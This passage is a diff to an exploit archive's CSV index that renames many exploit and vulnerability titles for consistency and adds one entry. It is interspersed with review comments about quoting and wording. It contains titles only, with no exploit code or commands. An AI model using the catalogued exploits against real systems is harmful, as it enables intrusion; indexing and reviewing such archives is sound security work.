+39648,platforms/windows/dos/39648.txt,"Microsoft Windows Kernel - 'NtGdiGetTextExtentExW'' Out-of-Bounds Memory Read",2016-04-01,"Nils Sommer",windows,dos,0
 39649,platforms/multiple/dos/39649.txt,"Adobe Flash - URLStream.readObject Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0
 39650,platforms/multiple/dos/39650.txt,"Adobe Flash - textfield.maxChars Use-After-Free",2016-04-01,"Google Security Research",multiple,dos,0
 39651,platforms/android/dos/39651.txt,"Google Android - 'ih264d_process_intra_mb' Memory Corruption",2016-04-01,"Google Security Research",android,dos,0
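Review bot: The new title on the `+39648` row closes the quoted name with two apostrophes, `'NtGdiGetTextExtentExW''`, where every other re-quoted row in this commit uses one. It should read `'NtGdiGetTextExtentExW' Out-of-Bounds Memory Read`. The stray quote changes the exact title string, so tooling that matches or de-duplicates entries by title will treat it as a different name.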
@@ -5286,7 +5286,7 @@ id,file,description,date,author,platform,type,port
 40722,platforms/windows/dos/40722.html,"Microsoft Internet Explorer 9 - MSHTML CPtsTextParaclient::CountApes Out-of-Bounds Read",2016-11-07,Skylined,windows,dos,0
 40731,platforms/linux/dos/40731.c,"Linux Kernel - TCP Related Read Use-After-Free",2016-08-18,"Marco Grassi",linux,dos,0
 40744,platforms/windows/dos/40744.txt,"Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137)",2016-11-09,"laurent gaffie",windows,dos,0
-40745,platforms/windows/dos/40745.c,"Microsoft Windows Kernel - win32k Denial of Service (MS16-135)",2016-11-09,TinySec,windows,dos,0
+40745,platforms/windows/dos/40745.c,"Microsoft Windows Kernel - 'win32k' Denial of Service (MS16-135)",2016-11-09,TinySec,windows,dos,0
 40747,platforms/windows/dos/40747.html,"Microsoft WININET.dll - CHttp­Header­Parser::Parse­Status­Line Out-of-Bounds Read (MS16-104/MS16-105)",2016-11-10,Skylined,windows,dos,0
 40748,platforms/windows/dos/40748.html,"Microsoft Internet Explorer 9/10/11 - MSHTML 'PROPERTYDESC::Handle­Style­Component­Property' Out-of-Bounds Read (MS16-104)",2016-11-10,Skylined,windows,dos,0
 40761,platforms/windows/dos/40761.html,"Microsoft Edge 11.0.10240.16384 - 'edgehtml' CAttr­Array::Destroy Use-After-Free",2016-11-15,Skylined,windows,dos,0
@@ -5508,7 +5508,7 @@ id,file,description,date,author,platform,type,port
 42001,platforms/windows/dos/42001.py,"Halliburton LogView Pro 10.0.1 - Local Buffer Overflow (SEH)",2017-05-14,Muhann4d,windows,dos,0
 42002,platforms/windows/dos/42002.txt,"Larson VizEx Reader 9.7.5 - Local Buffer Overflow (SEH)",2017-05-14,Muhann4d,windows,dos,0
 42006,platforms/windows/dos/42006.cpp,"Microsoft Windows 7 Kernel - Uninitialized Memory in the Default dacl Descriptor of System Processes Token",2017-05-15,"Google Security Research",windows,dos,0
-42007,platforms/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - nt!NtTraceControl (EtwpSetProviderTraits) Pool Memory Disclosure",2017-05-15,"Google Security Research",windows,dos,0
+42007,platforms/windows/dos/42007.cpp,"Microsoft Windows 10 Kernel - 'nt!NtTraceControl (EtwpSetProviderTraits)' Pool Memory Disclosure",2017-05-15,"Google Security Research",windows,dos,0
 42008,platforms/windows/dos/42008.cpp,"Microsoft Windows 7 Kernel - 'win32k!xxxClientLpkDrawTextEx' Stack Memory Disclosure",2017-05-15,"Google Security Research",windows,dos,0
 42009,platforms/windows/dos/42009.txt,"Microsoft Windows 7 Kernel - Pool-Based Out-of-Bounds Reads Due to bind() Implementation Bugs in afd.sys / tcpip.sys",2017-05-15,"Google Security Research",windows,dos,0
 42014,platforms/ios/dos/42014.txt,"Apple iOS < 10.3.2 - Notifications API Denial of Service",2017-05-17,CoffeeBreakers,ios,dos,0
@@ -5683,8 +5683,8 @@ id,file,description,date,author,platform,type,port
 42741,platforms/windows/dos/42741.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetGlyphOutline' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
 42742,platforms/windows/dos/42742.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiGetPhysicalMonitorDescription' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
 42743,platforms/windows/dos/42743.cpp,"Microsoft Windows Kernel - 'nt!NtSetIoCompletion / nt!NtRemoveIoCompletion' Pool Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
-42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel - win32k.sys '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)",2017-09-18,"Google Security Research",windows,dos,0
-42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - win32k.sys .TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0
+42744,platforms/windows/dos/42744.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)",2017-09-18,"Google Security Research",windows,dos,0
+42746,platforms/windows/dos/42746.txt,"Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow)",2017-09-18,"Google Security Research",windows,dos,0
 42748,platforms/windows/dos/42748.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiEngCreatePalette' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
 42749,platforms/windows/dos/42749.cpp,"Microsoft Windows Kernel - 'win32k!NtGdiDoBanding' Stack Memory Disclosure",2017-09-18,"Google Security Research",windows,dos,0
 42758,platforms/windows/dos/42758.txt,"Microsoft Edge 38.14393.1066.0 - Memory Corruption with Partial Page Loading",2017-09-19,"Google Security Research",windows,dos,0
@@ -5954,12 +5954,12 @@ id,file,description,date,author,platform,type,port
 1032,platforms/windows/local/1032.cpp,"Kaspersky AntiVirus - 'klif.sys' Privilege Escalation",2005-06-07,"Ilya Rabinovich",windows,local,0
 1034,platforms/windows/local/1034.cpp,"WinZip 8.1 - Command Line Local Buffer Overflow",2005-06-07,ATmaCA,windows,local,0
 1043,platforms/osx/local/1043.c,"Apple Mac OSX 10.4 - launchd Race Condition",2005-06-14,intropy,osx,local,0
-1044,platforms/aix/local/1044.c,"AIX 5.2 - netpmon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0
-1045,platforms/aix/local/1045.c,"AIX 5.2 - ipl_varyon Local Elevated Privileges Exploit",2005-06-14,intropy,aix,local,0
+1044,platforms/aix/local/1044.c,"AIX 5.2 - 'netpmon' Local Privilege Escalation",2005-06-14,intropy,aix,local,0
+1045,platforms/aix/local/1045.c,"AIX 5.2 - 'ipl_varyon' Local Privilege Escalation",2005-06-14,intropy,aix,local,0
 1046,platforms/aix/local/1046.c,"AIX 5.2 - 'paginit' Privilege Escalation",2005-06-14,intropy,aix,local,0
 1073,platforms/solaris/local/1073.c,"Solaris 9/10 - 'ld.so' Privilege Escalation (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0
 1074,platforms/solaris/local/1074.c,"Solaris 9/10 - 'ld.so' Privilege Escalation (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0
-1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 - Licence Info Disclosure Local Exploit",2005-07-04,Kozan,windows,local,0
+1085,platforms/windows/local/1085.c,"Willing Webcam 2.8 - Licence Information Disclosure Local Exploit",2005-07-04,Kozan,windows,local,0
 1086,platforms/windows/local/1086.c,"Access Remote PC 4.5.1 - Local Password Disclosure",2005-07-04,Kozan,windows,local,0
 1087,platforms/bsd/local/1087.c,"Sudo 1.3.1 < 1.6.8p (OpenBSD) - Pathname Validation Privilege Escalation",2005-07-04,RusH,bsd,local,0
 1091,platforms/windows/local/1091.c,"Internet Download Manager 4.0.5 - Input URL Stack Overflow",2005-07-06,c0d3r,windows,local,0
@@ -7378,8 +7378,8 @@ id,file,description,date,author,platform,type,port
 19229,platforms/aix/local/19229.txt,"IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation Vulnerabilities",1999-05-25,"Paul Cammidge",aix,local,0
 19232,platforms/solaris/local/19232.txt,"SunOS 4.1.4 - arp(8c) Memory Dump",1994-02-01,anonymous,solaris,local,0
 19233,platforms/solaris/local/19233.txt,"Solaris 7.0 - aspppd Insecure Temporary File Creation",1996-12-20,Al-Herbish,solaris,local,0
-19234,platforms/solaris/local/19234.c,"Solaris 7.0 cancel - Exploit",1999-03-05,"Josh A. Strickland",solaris,local,0
-19235,platforms/solaris/local/19235.txt,"Solaris 7.0 chkperm - Exploit",1996-12-05,"Kevin L Prigge",solaris,local,0
+19234,platforms/solaris/local/19234.c,"Solaris 7.0 - 'cancel' Exploit",1999-03-05,"Josh A. Strickland",solaris,local,0
+19235,platforms/solaris/local/19235.txt,"Solaris 7.0 - 'chkperm' Exploit",1996-12-05,"Kevin L Prigge",solaris,local,0
 19240,platforms/linux/local/19240.c,"Caldera kdenetwork 1.1.1-1 / Caldera OpenLinux 1.3/2.2 / KDE KDE 1.1/1.1. / RedHat Linux 6.0 - K-Mail File Creation",1999-06-09,"Brian Mitchell",linux,local,0
 19243,platforms/linux/local/19243.txt,"G. Wilford man 2.3.10 - Symlink Exploit",1999-06-02,"Thomas Fischbacher",linux,local,0
 19244,platforms/osx/local/19244.sh,"Apple Mac OSX Server 10.0 - Overload",1999-06-03,"Juergen Schmidt",osx,local,0
@@ -8446,7 +8446,7 @@ id,file,description,date,author,platform,type,port
 34371,platforms/windows/local/34371.py,"BlazeDVD Pro Player 7.0 - '.plf' Buffer Overflow (SEH)",2014-08-20,metacom,windows,local,0
 29190,platforms/osx/local/29190.txt,"Apple Mac OSX 10.4.x - Mach-O Binary Loading Integer Overflow",2006-11-26,LMH,osx,local,0
 29194,platforms/osx/local/29194.c,"Apple Mac OSX 10.4.x - AppleTalk AIOCRegLocalZN IOCTL Stack Buffer Overflow",2006-11-27,LMH,osx,local,0
-29201,platforms/osx/local/29201.c,"Apple Mac OSX 10.4.x - Shared_Region_Make_Private_Np Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0
+29201,platforms/osx/local/29201.c,"Apple Mac OSX 10.4.x - 'Shared_Region_Make_Private_Np' Kernel Function Local Memory Corruption",2006-11-29,LMH,osx,local,0
 29234,platforms/windows/local/29234.py,"VideoCharge Studio 2.12.3.685 - Buffer Overflow (SEH)",2013-10-27,metacom,windows,local,0
 29239,platforms/php/local/29239.txt,"PHP 5.2 - Session.Save_Path() 'Safe_mode' / 'open_basedir' Restriction Bypass",2006-12-08,"Maksymilian Arciemowicz",php,local,0
 29327,platforms/windows/local/29327.py,"Watermark Master 2.2.23 - Buffer Overflow (SEH)",2013-11-01,metacom,windows,local,0
@@ -9119,7 +9119,7 @@ id,file,description,date,author,platform,type,port
 40943,platforms/linux/local/40943.txt,"Google Chrome + Fedora 25 / Ubuntu 16.04 - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",linux,local,0
 40950,platforms/aix/local/40950.sh,"IBM AIX 6.1/7.1/7.2 - 'Bellmail' Privilege Escalation",2016-12-22,"Hector X. Monsegur",aix,local,0
 40953,platforms/linux/local/40953.sh,"Vesta Control Panel 0.9.8-16 - Privilege Escalation",2016-12-22,"Luka Pusic",linux,local,0
-40956,platforms/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 Kernel - _kernelrpc_mach_port_insert_right_trap Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
+40956,platforms/macos/local/40956.c,"Apple macOS < 10.12.2 / iOS < 10.2 - '_kernelrpc_mach_port_insert_right_trap' Kernel Reference Count Leak / Use-After-Free",2016-12-22,"Google Security Research",macos,local,0
 40957,platforms/macos/local/40957.c,"macOS < 10.12.2 / iOS < 10.2 - Broken Kernel Mach Port Name uref Handling Privileged Port Name Replacement Privilege Escalation",2016-12-22,"Google Security Research",macos,local,0
 40962,platforms/linux/local/40962.txt,"OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation",2016-12-23,"Google Security Research",linux,local,0
 40967,platforms/windows/local/40967.txt,"Wampserver 3.0.6 - Insecure File Permissions Privilege Escalation",2016-12-26,"Heliand Dema",windows,local,0
@@ -9306,6 +9306,7 @@ id,file,description,date,author,platform,type,port
 43007,platforms/linux/local/43007.txt,"Shadowsocks - Log File Command Execution",2017-10-17,"X41 D-Sec GmbH",linux,local,0
 43017,platforms/windows/local/43017.txt,"Microsoft Game Definition File Editor 6.3.9600 - XML External Entity Injection",2017-10-19,hyp3rlinx,windows,local,0
 43029,platforms/linux/local/43029.c,"Linux Kernel 4.14.0-rc4+ - 'waitid()' Privilege Escalation",2017-10-22,"@XeR_0x2A and @chaign_c",linux,local,0
+43033,platforms/windows/local/43033.py,"Mikogo 5.4.1.160608 - Local Credentials Disclosure",2017-10-23,LiquidWorm,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -10564,7 +10565,7 @@ id,file,description,date,author,platform,type,port
 9319,platforms/windows/remote/9319.py,"SAP Business One 2005-A License Manager - Remote Buffer Overflow",2009-08-01,Bruk0ut,windows,remote,30000
 9330,platforms/windows/remote/9330.py,"Amaya 11.2 - W3C Editor/Browser (defer) Remote Buffer Overflow (SEH)",2009-08-03,His0k4,windows,remote,0
 9422,platforms/hardware/remote/9422.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (1)",2009-08-12,hkm,hardware,remote,0
-9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 - 'user.ini' Arbitrary Download",2009-08-13,"aBo MoHaMeD",hardware,remote,0
+9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 - 'user.ini' Arbitrary Disclosure",2009-08-13,"aBo MoHaMeD",hardware,remote,0
 9443,platforms/windows/remote/9443.txt,"Adobe JRun 4 - 'logfile' Authenticated Directory Traversal",2009-08-18,DSecRG,windows,remote,0
 9456,platforms/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin",2009-08-18,SuNHouSe2,hardware,remote,0
 9468,platforms/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)",2009-08-18,Wraith,windows,remote,69
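Review bot: The new title for row 9432, `'user.ini' Arbitrary Disclosure`, no longer says what is disclosed, and the same wording is introduced for row 10362 in the next hunk. Other rows in this index use the form "Arbitrary File Disclosure" (for example 20405), so anyone searching the index for file-disclosure entries would miss these two. I would write `"THOMSON ST585 - 'user.ini' Arbitrary File Disclosure"` and the matching form for the TG585n entry.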
@@ -10710,7 +10711,7 @@ id,file,description,date,author,platform,type,port
 10269,platforms/windows/remote/10269.html,"Haihaisoft Universal Player 1.4.8.0 - 'URL' Property ActiveX Buffer Overflow",2009-12-01,shinnai,windows,remote,0
 10282,platforms/linux/remote/10282.py,"OrzHTTPd - Format String",2009-12-03,"Patroklos Argyroudis",linux,remote,80
 10340,platforms/windows/remote/10340.pl,"Symantec (Multiple Products) - Intel Common Base Agent Remote Command Execution",2009-04-28,kingcope,windows,remote,0
-10362,platforms/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Download",2009-12-09,"AnTi SeCuRe",hardware,remote,0
+10362,platforms/hardware/remote/10362.txt,"THOMSON TG585n 7.4.3.2 - 'user.ini' Arbitrary Disclosure",2009-12-09,"AnTi SeCuRe",hardware,remote,0
 10365,platforms/windows/remote/10365.rb,"Eureka Email 2.2q - ERR Remote Buffer Overflow (Metasploit) (1)",2009-12-09,dookie,windows,remote,0
 10375,platforms/windows/remote/10375.html,"SAP GUI for Windows - 'sapirrfc.dll' ActiveX Overflow",2009-12-10,Abysssec,windows,remote,0
 10380,platforms/windows/remote/10380.pl,"Sunbird 0.9 - Array Overrun Code Execution",2009-12-11,"Maksymilian Arciemowicz and sp3x",windows,remote,0
@@ -10827,7 +10828,7 @@ id,file,description,date,author,platform,type,port
 12865,platforms/hardware/remote/12865.txt,"Motorola Surfboard Cable Modem - Directory Traversal",2010-06-03,"S2 Crew",hardware,remote,0
 40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80
 13735,platforms/osx/remote/13735.py,"Apple Mac OSX EvoCam Web Server 3.6.6/3.6.7 - Buffer Overflow",2010-06-05,d1dn0t,osx,remote,8080
-13787,platforms/multiple/remote/13787.txt,"Adobe Flash and Reader - Live Malware (PoC)",2010-06-09,Unknown,multiple,remote,0
+13787,platforms/multiple/remote/13787.txt,"Adobe Flash / Reader - Live Malware (PoC)",2010-06-09,Unknown,multiple,remote,0
 13808,platforms/windows/remote/13808.txt,"Microsoft Windows Help Centre Handles - Malformed Escape Sequences Incorrectly (MS03-044)",2010-06-10,"Tavis Ormandy",windows,remote,0
 13818,platforms/windows/remote/13818.txt,"Nginx 0.8.36 - Source Disclosure / Denial of Service",2010-06-11,Dr_IDE,windows,remote,0
 13822,platforms/windows/remote/13822.txt,"Nginx 0.7.65/0.8.39 (dev) - Source Disclosure / Download",2010-06-11,"Jose A. Vazquez",windows,remote,0
@@ -12315,7 +12316,7 @@ id,file,description,date,author,platform,type,port
 20405,platforms/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure",2000-11-14,steeLe,cgi,remote,0
 20406,platforms/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 - Memory Contents Disclosure",2000-11-16,CORE-SDI,multiple,remote,0
 20408,platforms/cgi/remote/20408.txt,"Markus Triska CGIForum 1.0 - 'thesection' Directory Traversal",2000-11-20,zorgon,cgi,remote,0
-20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - JSP Source Disclosure",2000-11-21,"Wojciech Woch",jsp,remote,0
+20412,platforms/jsp/remote/20412.txt,"Unify eWave ServletExec 3 - .JSP Source Disclosure",2000-11-21,"Wojciech Woch",jsp,remote,0
 20413,platforms/unix/remote/20413.txt,"BB4 Big Brother Network Monitor 1.5 d2 - 'bb-hist.sh?HISTFILE' File Existence Disclosure",2000-11-20,"f8 Research Labs",unix,remote,0
 20414,platforms/unix/remote/20414.c,"Ethereal - AFS Buffer Overflow",2000-11-18,mat,unix,remote,0
 20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 - '.wms' Arbitrary Script (MS00-090)",2000-11-22,"Sandro Gauci",windows,remote,0
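Review bot: The renamed title for row 20412 writes the extension as a bare `.JSP`, while the same commit quotes extensions elsewhere (row 42746 is changed from `.TTF` to `'.TTF'`, and the context row 20424 already has `'.wms'`). Keeping one form matters because tools that match on the title text treat the quoted and unquoted forms as different strings. I would write `"Unify eWave ServletExec 3 - '.JSP' Source Disclosure"`.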
@@ -12567,7 +12568,7 @@ id,file,description,date,author,platform,type,port
 20940,platforms/cgi/remote/20940.txt,"Tarantella Enterprise 3 3.x - TTAWebTop.cgi Arbitrary File Viewing",2001-06-18,kf,cgi,remote,0
 20941,platforms/freebsd/remote/20941.pl,"W3M 0.1/0.2 - Malformed MIME Header Buffer Overflow",2001-06-19,White_E,freebsd,remote,0
 20947,platforms/windows/remote/20947.txt,"1C: Arcadia Internet Store 1.0 - Arbitrary File Disclosure",2001-06-21,ViperSV,windows,remote,0
-20948,platforms/windows/remote/20948.txt,"1C: Arcadia Internet Store 1.0 - Show Path",2001-06-21,ViperSV,windows,remote,0
+20948,platforms/windows/remote/20948.txt,"1C: Arcadia Internet Store 1.0 - Path Disclosure",2001-06-21,ViperSV,windows,remote,0
 20950,platforms/windows/remote/20950.c,"Microsoft Visual Studio RAD Support - Buffer Overflow",2001-06-21,"NSFOCUS Security Team",windows,remote,0
 20951,platforms/windows/remote/20951.pm,"Microsoft Visual Studio RAD Support - Buffer Overflow (MS03-051) (Metasploit)",2001-06-21,"NSFOCUS Security Team",windows,remote,0
 20953,platforms/linux/remote/20953.c,"eXtremail 1.x/2.1 - Remote Format String (2)",2001-06-21,mu-b,linux,remote,0
@@ -14282,7 +14283,7 @@ id,file,description,date,author,platform,type,port
 30078,platforms/multiple/remote/30078.js,"Apple Safari 2.0.4 - Cross-Domain Browser Location Information Disclosure",2007-05-23,"Gareth Heyes",multiple,remote,0
 30089,platforms/linux/remote/30089.txt,"Ruby on Rails 1.2.3 To_JSON - Script Injection",2007-05-25,BCC,linux,remote,0
 30209,platforms/windows/remote/30209.rb,"HP LoadRunner EmulationAdmin - Web Service Directory Traversal (Metasploit)",2013-12-11,Metasploit,windows,remote,8080
-30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 - Administrative Login Bypass (Metasploit)",2013-12-11,Metasploit,multiple,remote,80
+30210,platforms/multiple/remote/30210.rb,"Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit)",2013-12-11,Metasploit,multiple,remote,80
 30211,platforms/windows/remote/30211.txt,"EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet Remote Code Execution",2013-12-11,rgod,windows,remote,0
 30212,platforms/php/remote/30212.rb,"vBulletin 5 - 'index.php/ajax/api/reputation/vote?nodeid' SQL Injection (Metasploit)",2013-12-11,Metasploit,php,remote,80
 30218,platforms/multiple/remote/30218.txt,"BugHunter HTTP Server 1.6.2 - Parse Error Information Disclosure",2007-06-20,Prili,multiple,remote,0
@@ -14327,7 +14328,7 @@ id,file,description,date,author,platform,type,port
 30491,platforms/multiple/remote/30491.java,"OWASP Stinger - Filter Bypass",2007-08-13,"Meder Kydyraliev",multiple,remote,0
 30493,platforms/windows/remote/30493.js,"Microsoft XML Core Services 6.0 - SubstringData Integer Overflow",2007-08-14,anonymous,windows,remote,0
 30495,platforms/multiple/remote/30495.html,"Apache Tomcat 6.0.13 - Host Manager Servlet Cross-Site Scripting",2007-08-14,"NTT OSS CENTER",multiple,remote,0
-30496,platforms/multiple/remote/30496.txt,"Apache Tomcat 6.0.13 - Cookie Handling Quote Delimiter Session ID Disclosure",2007-08-14,"Tomasz Kuczynski",multiple,remote,0
+30496,platforms/multiple/remote/30496.txt,"Apache Tomcat 6.0.13 - Insecure Cookie Handling Quote Delimiter Session ID Disclosure",2007-08-14,"Tomasz Kuczynski",multiple,remote,0
 30499,platforms/multiple/remote/30499.txt,"RndLabs Babo Violent 2 - Multiple Vulnerabilities",2007-08-14,"Luigi Auriemma",multiple,remote,0
 30502,platforms/java/remote/30502.txt,"Sun Java Runtime Environment 1.4.2 - Font Parsing Privilege Escalation",2007-08-15,"John Heasman",java,remote,0
 30507,platforms/multiple/remote/30507.txt,"gMotor2 Game Engine - Multiple Vulnerabilities",2007-08-18,"Luigi Auriemma",multiple,remote,0
@@ -17049,7 +17050,7 @@ id,file,description,date,author,platform,type,port
 1881,platforms/php/webapps/1881.txt,"DreamAccount 3.1 - 'da_path' Remote File Inclusion",2006-06-05,Aesthetico,php,webapps,0
 1882,platforms/php/webapps/1882.pl,"Dmx Forum 2.1a - 'edit.php' Remote Password Disclosure",2006-06-05,DarkFig,php,webapps,0
 1883,platforms/php/webapps/1883.txt,"Wikiwig 4.1 - 'wk_lang.php' Remote File Inclusion",2006-06-06,Kacper,php,webapps,0
-1884,platforms/asp/webapps/1884.htm,"myNewsletter 1.1.2 - 'adminLogin.asp' Login Bypass",2006-06-06,FarhadKey,asp,webapps,0
+1884,platforms/asp/webapps/1884.htm,"myNewsletter 1.1.2 - 'adminLogin.asp' Authentication Bypass",2006-06-06,FarhadKey,asp,webapps,0
 1886,platforms/php/webapps/1886.txt,"OpenEMR 2.8.1 - 'fileroot' Remote File Inclusion",2006-06-07,Kacper,php,webapps,0
 1887,platforms/php/webapps/1887.txt,"Xtreme/Ditto News 1.0 - 'post.php' Remote File Inclusion",2006-06-07,Kacper,php,webapps,0
 1888,platforms/php/webapps/1888.txt,"Back-End CMS 0.7.2.1 - 'jpcache.php' Remote File Inclusion",2006-06-08,"Federico Fazzi",php,webapps,0
@@ -17657,7 +17658,7 @@ id,file,description,date,author,platform,type,port
 2694,platforms/php/webapps/2694.php,"T.G.S. CMS 0.1.7 - 'logout.php' SQL Injection",2006-10-31,Kacper,php,webapps,0
 2696,platforms/php/webapps/2696.php,"Invision Power Board 2.1.7 - 'Debug' Remote Password Change Exploit",2006-11-01,Rapigator,php,webapps,0
 2697,platforms/php/webapps/2697.php,"Innovate Portal 2.0 - 'acp.php' Remote Code Execution",2006-11-01,Kacper,php,webapps,0
-2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - '/admin/configuration.inc.php' Local Inclusion Exploit",2006-11-01,Kw3[R]Ln,php,webapps,0
+2698,platforms/php/webapps/2698.pl,"2BGal 3.0 - '/admin/configuration.inc.php' Local File Inclusion",2006-11-01,Kw3[R]Ln,php,webapps,0
 2701,platforms/php/webapps/2701.txt,"TikiWiki 1.9.5 Sirius - 'sort_mode' Information Disclosure",2006-11-01,securfrog,php,webapps,0
 2702,platforms/php/webapps/2702.php,"Lithium CMS 4.04c - '/classes/index.php' Local File Inclusion",2006-11-02,Kacper,php,webapps,0
 2703,platforms/php/webapps/2703.txt,"Article System 0.6 - 'volume.php' Remote File Inclusion",2006-11-02,GregStar,php,webapps,0
@@ -17714,8 +17715,8 @@ id,file,description,date,author,platform,type,port
 2768,platforms/php/webapps/2768.txt,"ContentNow 1.30 - Local File Inclusion / Arbitrary File Upload/Delete",2006-11-13,r0ut3r,php,webapps,0
 2769,platforms/php/webapps/2769.php,"Quick.Cart 2.0 - '/actions_client/gallery.php' Local File Inclusion",2006-11-13,Kacper,php,webapps,0
 2772,platforms/asp/webapps/2772.htm,"Online Event Registration 2.0 - 'save_profile.asp' Pass Change Exploit",2006-11-13,ajann,asp,webapps,0
-2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Login Bypass",2006-11-13,ajann,asp,webapps,0
-2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - 'vir_Login.asp' Remote Login Bypass",2006-11-13,ajann,asp,webapps,0
+2773,platforms/asp/webapps/2773.txt,"Estate Agent Manager 1.3 - 'default.asp' Authentication Bypass",2006-11-13,ajann,asp,webapps,0
+2774,platforms/asp/webapps/2774.txt,"Property Pro 1.0 - 'vir_Login.asp' Remote Authentication Bypass",2006-11-13,ajann,asp,webapps,0
 2775,platforms/php/webapps/2775.txt,"Phpjobscheduler 3.0 - 'installed_config_file' File Inclusion",2006-11-13,Firewall,php,webapps,0
 2776,platforms/php/webapps/2776.txt,"ContentNow 1.30 - Arbitrary File Upload / Cross-Site Scripting",2006-11-14,Timq,php,webapps,0
 2777,platforms/php/webapps/2777.txt,"Aigaion 1.2.1 - 'DIR' Remote File Inclusion",2006-11-14,navairum,php,webapps,0
@@ -17723,7 +17724,7 @@ id,file,description,date,author,platform,type,port
 2779,platforms/asp/webapps/2779.txt,"ASP Smiley 1.0 - 'default.asp' Login Bypass 'SQL Injection'",2006-11-14,ajann,asp,webapps,0
 2780,platforms/asp/webapps/2780.txt,"NetVIOS 2.0 - 'page.asp' SQL Injection",2006-11-14,ajann,asp,webapps,0
 2781,platforms/asp/webapps/2781.txt,"blogme 3.0 - Cross-Site Scripting / Authentication Bypass",2006-11-14,"Security Access Point",asp,webapps,0
-2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart - Remote Login Bypass",2006-11-14,"Security Access Point",asp,webapps,0
+2782,platforms/asp/webapps/2782.txt,"Hpecs Shopping Cart - Remote Authentication Bypass",2006-11-14,"Security Access Point",asp,webapps,0
 2786,platforms/php/webapps/2786.txt,"torrentflux 2.2 - Arbitrary File Create/ Execute/Delete",2006-11-15,r0ut3r,php,webapps,0
 2790,platforms/php/webapps/2790.pl,"Etomite CMS 0.6.1.2 - '/manager/index.php' Local File Inclusion",2006-11-16,Revenge,php,webapps,0
 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool - 'download.php' Information Disclosure",2006-11-16,"Craig Heffner",php,webapps,0
@@ -17805,7 +17806,7 @@ id,file,description,date,author,platform,type,port
 2906,platforms/php/webapps/2906.pl,"Fantastic News 2.1.4 - 'news.php' SQL Injection",2006-12-09,Bl0od3r,php,webapps,0
 2907,platforms/asp/webapps/2907.txt,"SpotLight CRM 1.0 - 'login.asp' SQL Injection",2006-12-09,ajann,asp,webapps,0
 2908,platforms/asp/webapps/2908.txt,"Request For Travel 1.0 - 'product' SQL Injection",2006-12-09,ajann,asp,webapps,0
-2909,platforms/asp/webapps/2909.txt,"HR Assist 1.05 - 'vdateUsr.asp' Remote Login Bypass",2006-12-09,ajann,asp,webapps,0
+2909,platforms/asp/webapps/2909.txt,"HR Assist 1.05 - 'vdateUsr.asp' Remote Authentication Bypass",2006-12-09,ajann,asp,webapps,0
 2913,platforms/php/webapps/2913.php,"PHPAlbum 0.4.1 Beta 6 - 'language.php' Local File Inclusion",2006-12-10,Kacper,php,webapps,0
 2917,platforms/php/webapps/2917.txt,"mxBB Module ErrorDocs 1.0 - 'common.php' Remote File Inclusion",2006-12-11,bd0rk,php,webapps,0
 2919,platforms/php/webapps/2919.pl,"mxBB Module Activity Games 0.92 - Remote File Inclusion",2006-12-11,3l3ctric-Cracker,php,webapps,0
